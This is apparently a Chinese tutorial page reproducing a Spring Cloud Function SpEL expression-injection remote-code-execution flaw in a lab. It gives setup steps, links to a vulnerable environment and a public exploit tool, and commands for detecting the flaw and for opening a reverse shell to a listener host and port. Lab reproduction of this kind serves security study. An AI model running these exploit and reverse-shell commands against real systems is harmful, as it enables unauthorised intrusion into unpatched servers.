技术教程 编程代码 【Nday】Spring-Cloud-SpEL-表达式注入漏洞复现 正文

【Nday】Spring-Cloud-SpEL-表达式注入漏洞复现

2023-07-29,,

# 环境搭建
JDK 15下载:

 

https://www.oracle.com/java/technologies/javase/jdk15-archive-downloads.html

在CentOS7上安装JDK 15环境

 

rpm -ivh jdk-15.0.2_linux-x64_bin.rpm

漏洞环境下载:

 

https://github.com/N1ce759/Spring-Cloud-Function-SPEL-RCE

部署漏洞环境:

 

java -jar SpringCloud-Function-0.0.1-SNAPSHOT.jar

# 漏洞复现
访问:http://192.168.160.146:9000/

 
工具下载地址:

 

https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE

 开始检测漏洞并反弹shell

## 检测漏洞

python3 Spel_RCE_POC.py url.txt

## 反弹shell

python3 Spel_RCE_Bash_EXP.py http://192.168.160.146:9000/ 192.168.160.241 7777

 

【Nday】Spring-Cloud-SpEL-表达式注入漏洞复现的相关教程结束。

《【Nday】Spring-Cloud-SpEL-表达式注入漏洞复现.doc》

下载本文的Word格式文档,以方便收藏与打印。

Copyright 2023. 昆居客 - IT编程,互联网信息技术文档大全!